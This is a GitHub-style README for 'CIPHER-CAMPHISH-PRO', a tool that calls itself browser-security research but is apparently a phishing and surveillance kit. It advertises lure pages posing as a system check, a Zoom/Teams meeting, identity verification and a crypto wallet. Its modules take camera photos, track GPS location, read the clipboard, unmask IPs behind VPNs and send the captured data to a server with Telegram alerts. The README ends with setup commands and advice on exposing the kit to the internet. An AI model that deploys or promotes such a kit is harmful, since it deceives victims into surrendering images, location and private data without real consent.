The Ultimate Browser Security Audit Tool
"I build what others fear to understand." A tool for testing how browsers leak data and checking system vulnerabilities.
CIPHER-CAMPHISH-PRO is my personal research framework for testing browser security. It helps to see how easy it is for websites to grab system info, camera access, and location data if the browser isn't properly locked down. I built this to show real-world data leak examples.
| Module | Identifier | What it does | Status |
|---|---|---|---|
| Camera Access | CAM-SYNC |
Takes photos from the front/back camera. | STABLE |
| Data Mover | EXFIL-CORE |
Sends captured data to the target server. | FAST |
| GPS Tracker | GPS-SYNC |
Finds where the device is located. | STABLE |
| Clipboard Grab | CLIP-SYNC |
Checks what was last copied to the clipboard. | ACTIVE |
| Device Specs | DNA-CORE |
Gets info on RAM, CPU, and Battery health. | STABLE |
| Network Info | IP-BYPASS |
Finds the real IP even behind a VPN. | BYPASS |
This tool comes with ready-made pages to test different environments:
- System Check: A fake diagnostic page to test user trust.
- Meeting Test: Simulates a Zoom/Teams call setup for media testing.
- Identity Verify: Testing how biometric sensors react to scripts.
- Wallet Test: Checking for vulnerabilities in crypto wallet interactions.
graph TD
A[Target User] --> B{Attack Engine}
B --> C[Data Analysis]
B --> D[File Storage]
B --> E[Telegram Alert]
style B fill:#10b981,stroke:#000,stroke-width:2px,color:#000
# Get the tool
git clone https://github.com/cipher-attack/camphish-pro.git
# Give permissions
cd camphish-pro && chmod +x *
# Start the script
./cipher.shQuick Tip: Use Cloudflared (1) if you're testing over the internet. For local lab tests, Localhost (3) is the easiest.
|
12th Grade Student & Security Researcher I'm a self-taught security enthusiast from Ethiopia. I spend my time learning how to break and fix systems. I code and manage all my projects using Termux on my phone. |
This is for educational use only. Don't use it on people without their permission. I am not responsible for what you do with this code. Stay ethical.